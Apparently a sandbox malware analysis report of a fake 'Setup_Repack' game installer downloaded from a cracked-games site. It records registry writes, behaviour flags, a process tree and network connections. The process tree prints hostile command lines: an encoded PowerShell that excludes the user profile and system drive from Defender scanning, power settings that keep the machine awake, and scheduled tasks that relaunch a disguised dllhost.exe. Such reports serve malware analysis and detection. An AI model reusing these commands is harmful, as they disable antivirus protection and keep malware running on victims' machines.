| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\MSTTSLocenUS.dat" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mediafire.com\ = "1343" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "40C" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\Setup_Repack.zip.t2sbfdg.partial:Zone.Identifier | C:\Windows\system32\browser_broker.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\LaunchWinApp.exe
"C:\Windows\system32\LaunchWinApp.exe" "https://feel-easy.games/catalog/counter-strike-go/"
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\8e2e508d1cdf4962b651ae1c84f59cf3 /t 0 /p 1396
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\Setup_Repack\" -ad -an -ai#7zMap2531:228:7zEvent11327
C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe
"C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\read me.txt
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\conhost.exe
"C:\Users\Admin\AppData\Local\Temp\conhost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p1432210452150682449214609890 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_8.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "Installer.exe"
C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
"Installer.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjADMATAAxAEMAaAB4ADUATAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUATwA4AFIAdwBXAEwARQAyAEMAUgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBqAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQA1ADAAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjADMATAAxAEMAaAB4ADUATAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUATwA4AFIAdwBXAEwARQAyAEMAUgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBqAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQA1ADAAIwA+AA=="
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
C:\Windows\SysWOW64\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\SysWOW64\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\SysWOW64\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\SysWOW64\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\SysWOW64\powercfg.exe
powercfg /hibernate off
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4901" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4901" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | feel-easy.games | udp |
| RU | 185.105.110.5:443 | feel-easy.games | tcp |
| RU | 185.105.110.5:443 | feel-easy.games | tcp |
| US | 8.8.8.8:53 | 5.110.105.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.33.222.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.25.221.88.in-addr.arpa | udp |
| RU | 185.105.110.5:443 | feel-easy.games | tcp |
| RU | 185.105.110.5:443 | feel-easy.games | tcp |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 104.16.53.48:443 | www.mediafire.com | tcp |
| US | 104.16.53.48:443 | www.mediafire.com | tcp |
| US | 8.8.8.8:53 | the.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 8.8.8.8:53 | www.ezojs.com | udp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| US | 172.67.144.62:443 | the.gatekeeperconsent.com | tcp |
| US | 172.67.144.62:443 | the.gatekeeperconsent.com | tcp |
| NL | 142.250.179.206:443 | translate.google.com | tcp |
| NL | 142.250.179.206:443 | translate.google.com | tcp |
| US | 172.67.201.96:443 | www.ezojs.com | tcp |
| US | 172.67.201.96:443 | www.ezojs.com | tcp |
| US | 172.67.70.134:443 | btloader.com | tcp |
| US | 172.67.70.134:443 | btloader.com | tcp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 104.16.56.101:443 | static.cloudflareinsights.com | tcp |
| US | 104.16.56.101:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | 48.53.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.14.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.201.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.144.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.70.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.56.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | privacy.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | cdn.amplitude.com | udp |
| US | 172.67.144.62:443 | privacy.gatekeeperconsent.com | tcp |
| US | 172.67.144.62:443 | privacy.gatekeeperconsent.com | tcp |
| NL | 108.156.61.101:443 | cdn.amplitude.com | tcp |
| NL | 108.156.61.101:443 | cdn.amplitude.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| US | 104.16.53.48:443 | www.mediafire.com | tcp |
| US | 104.16.53.48:443 | www.mediafire.com | tcp |
| US | 8.8.8.8:53 | static.mediafire.com | udp |
| US | 104.16.54.48:443 | static.mediafire.com | tcp |
| US | 104.16.54.48:443 | static.mediafire.com | tcp |
| US | 104.16.54.48:443 | static.mediafire.com | tcp |
| US | 104.16.54.48:443 | static.mediafire.com | tcp |
| US | 104.16.54.48:443 | static.mediafire.com | tcp |
| US | 104.16.54.48:443 | static.mediafire.com | tcp |
| US | 8.8.8.8:53 | 35.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.61.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.247.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.61.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.54.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.137.222.52.in-addr.arpa | udp |
| RU | 185.105.110.5:443 | feel-easy.games | tcp |
| RU | 185.105.110.5:443 | feel-easy.games | tcp |
| US | 104.16.53.48:443 | static.mediafire.com | tcp |
| US | 104.16.53.48:443 | static.mediafire.com | tcp |
| US | 172.67.70.134:443 | btloader.com | tcp |
| US | 172.67.70.134:443 | btloader.com | tcp |
| NL | 142.250.179.206:443 | translate.google.com | tcp |
| NL | 142.250.179.206:443 | translate.google.com | tcp |
| NL | 108.156.61.101:443 | cdn.amplitude.com | tcp |
| NL | 108.156.61.101:443 | cdn.amplitude.com | tcp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| US | 104.16.54.48:443 | static.mediafire.com | tcp |
| US | 104.16.54.48:443 | static.mediafire.com | tcp |
| US | 104.16.54.48:443 | static.mediafire.com | tcp |
| US | 104.16.54.48:443 | static.mediafire.com | tcp |
| US | 104.16.54.48:443 | static.mediafire.com | tcp |
| US | 104.16.54.48:443 | static.mediafire.com | tcp |
| NL | 142.251.39.106:443 | translate.googleapis.com | tcp |
| NL | 142.251.39.106:443 | translate.googleapis.com | tcp |
| US | 8.8.8.8:53 | privacy.ezodn.com | udp |
| US | 172.64.170.5:443 | privacy.ezodn.com | tcp |
| US | 172.64.170.5:443 | privacy.ezodn.com | tcp |
| US | 8.8.8.8:53 | 133.137.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| NL | 23.222.33.142:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.39.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.170.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.amplitude.com | udp |
| US | 54.245.0.38:443 | api.amplitude.com | tcp |
| US | 54.245.0.38:443 | api.amplitude.com | tcp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| US | 3.210.81.252:443 | g.ezoic.net | tcp |
| US | 3.210.81.252:443 | g.ezoic.net | tcp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.0.245.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | go.ezodn.com | udp |
| US | 172.64.170.5:443 | go.ezodn.com | tcp |
| US | 172.64.170.5:443 | go.ezodn.com | tcp |
| US | 172.64.170.5:443 | go.ezodn.com | tcp |
| US | 172.64.170.5:443 | go.ezodn.com | tcp |
| US | 172.64.170.5:443 | go.ezodn.com | tcp |
| US | 8.8.8.8:53 | 101.15.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.81.210.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.81.21.72.in-addr.arpa | udp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 216.239.38.181:443 | analytics.google.com | tcp |
| US | 216.239.38.181:443 | analytics.google.com | tcp |
| NL | 142.250.102.155:443 | stats.g.doubleclick.net | tcp |
| NL | 142.250.102.155:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | download1514.mediafire.com | udp |
| US | 205.196.123.202:443 | download1514.mediafire.com | tcp |
| US | 205.196.123.202:443 | download1514.mediafire.com | tcp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | prebid.media.net | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 34.235.214.237:443 | btlr.sharethrough.com | tcp |
| US | 34.235.214.237:443 | btlr.sharethrough.com | tcp |
| US | 34.235.214.237:443 | btlr.sharethrough.com | tcp |
| US | 34.235.214.237:443 | btlr.sharethrough.com | tcp |
| US | 34.235.214.237:443 | btlr.sharethrough.com | tcp |
| DE | 172.217.23.194:443 | securepubads.g.doubleclick.net | tcp |
| DE | 172.217.23.194:443 | securepubads.g.doubleclick.net | tcp |
| US | 34.107.148.139:443 | prebid.media.net | tcp |
| US | 34.107.148.139:443 | prebid.media.net | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| US | 8.8.8.8:53 | 206.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.38.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.123.196.205.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.148.107.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.214.235.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| NL | 142.250.179.206:443 | fundingchoicesmessages.google.com | tcp |
| NL | 142.250.179.206:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 8.8.8.8:53 | oa.openxcdn.net | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | cdn.prod.uidapi.com | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | invstatic101.creativecdn.com | udp |
| US | 34.102.146.192:443 | oa.openxcdn.net | tcp |
| US | 34.102.146.192:443 | oa.openxcdn.net | tcp |
| DE | 65.9.66.122:443 | tags.crwdcntrl.net | tcp |
| DE | 65.9.66.122:443 | tags.crwdcntrl.net | tcp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | tcp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | tcp |
| NL | 52.222.141.36:443 | cdn.prod.uidapi.com | tcp |
| NL | 52.222.141.36:443 | cdn.prod.uidapi.com | tcp |
| FR | 178.250.7.2:443 | static.criteo.net | tcp |
| FR | 178.250.7.2:443 | static.criteo.net | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 172.67.38.106:443 | cdn.id5-sync.com | tcp |
| US | 172.67.38.106:443 | cdn.id5-sync.com | tcp |
| US | 8.8.8.8:53 | 192.146.102.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | d0e8d4c226d6d925a8ec056d7828fa38.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| NL | 142.250.179.161:443 | d0e8d4c226d6d925a8ec056d7828fa38.safeframe.googlesyndication.com | tcp |
| NL | 142.250.179.161:443 | d0e8d4c226d6d925a8ec056d7828fa38.safeframe.googlesyndication.com | tcp |
| NL | 142.251.36.1:443 | lh3.googleusercontent.com | tcp |
| NL | 142.251.36.1:443 | lh3.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| DE | 162.19.138.120:443 | id5-sync.com | tcp |
| DE | 162.19.138.120:443 | id5-sync.com | tcp |
| US | 34.206.201.46:443 | bcp.crwdcntrl.net | tcp |
| US | 34.206.201.46:443 | bcp.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | oajs.openx.net | udp |
| US | 34.120.135.53:443 | oajs.openx.net | tcp |
| US | 34.120.135.53:443 | oajs.openx.net | tcp |
| US | 8.8.8.8:53 | ocsp.r2m01.amazontrust.com | udp |
| NL | 54.192.87.164:80 | ocsp.r2m01.amazontrust.com | tcp |
| US | 8.8.8.8:53 | esp.rtbhouse.com | udp |
| US | 35.190.39.111:443 | esp.rtbhouse.com | tcp |
| US | 35.190.39.111:443 | esp.rtbhouse.com | tcp |
| US | 8.8.8.8:53 | 87.70.96.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.141.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.38.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.66.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.7.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.208.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.201.206.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.135.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.87.192.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| NL | 142.250.179.130:443 | googleads.g.doubleclick.net | tcp |
| NL | 142.250.179.130:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | dsum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| CA | 185.80.39.216:443 | dsum-sec.casalemedia.com | tcp |
| CA | 185.80.39.216:443 | dsum-sec.casalemedia.com | tcp |
| DE | 37.252.171.52:443 | ib.adnxs.com | tcp |
| DE | 37.252.171.52:443 | ib.adnxs.com | tcp |
| US | 8.8.8.8:53 | 111.39.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.211.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.171.252.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.39.80.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| NL | 142.250.179.161:443 | cdn.ampproject.org | tcp |
| NL | 142.250.179.161:443 | cdn.ampproject.org | tcp |
| NL | 142.250.179.161:443 | cdn.ampproject.org | tcp |
| NL | 142.250.179.161:443 | cdn.ampproject.org | tcp |
| NL | 142.250.179.161:443 | cdn.ampproject.org | tcp |
| NL | 142.251.36.1:443 | tpc.googlesyndication.com | tcp |
| NL | 142.251.36.1:443 | tpc.googlesyndication.com | tcp |
| NL | 142.251.36.1:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | google-bidout-d.openx.net | udp |
| US | 8.8.8.8:53 | s0.2mdn.net | udp |
| US | 35.244.159.8:443 | google-bidout-d.openx.net | tcp |
| US | 35.244.159.8:443 | google-bidout-d.openx.net | tcp |
| NL | 142.250.179.134:443 | s0.2mdn.net | tcp |
| NL | 142.250.179.134:443 | s0.2mdn.net | tcp |
| CA | 185.80.39.216:443 | dsum-sec.casalemedia.com | tcp |
| CA | 185.80.39.216:443 | dsum-sec.casalemedia.com | tcp |
| CA | 185.80.39.216:443 | dsum-sec.casalemedia.com | tcp |
| US | 8.8.8.8:53 | 22.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.159.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c1.adform.net | udp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| DK | 37.157.3.20:443 | c1.adform.net | tcp |
| DK | 37.157.3.20:443 | c1.adform.net | tcp |
| IE | 67.220.228.200:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 67.220.228.200:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 8.8.8.8:53 | googleads4.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.googletagservices.com | udp |
| NL | 172.217.168.226:443 | www.googletagservices.com | tcp |
| NL | 172.217.168.226:443 | www.googletagservices.com | tcp |
| US | 8.8.8.8:53 | eu-u.openx.net | udp |
| US | 34.98.64.218:443 | eu-u.openx.net | tcp |
| US | 34.98.64.218:443 | eu-u.openx.net | tcp |
| US | 8.8.8.8:53 | 20.3.157.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.40.223.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.228.220.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.20.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| NL | 104.85.0.200:443 | ads.pubmatic.com | tcp |
| NL | 104.85.0.200:443 | ads.pubmatic.com | tcp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| NL | 104.85.0.23:443 | contextual.media.net | tcp |
| NL | 104.85.0.23:443 | contextual.media.net | tcp |
| US | 8.8.8.8:53 | image6.pubmatic.com | udp |
| NL | 198.47.127.19:443 | image6.pubmatic.com | tcp |
| NL | 198.47.127.19:443 | image6.pubmatic.com | tcp |
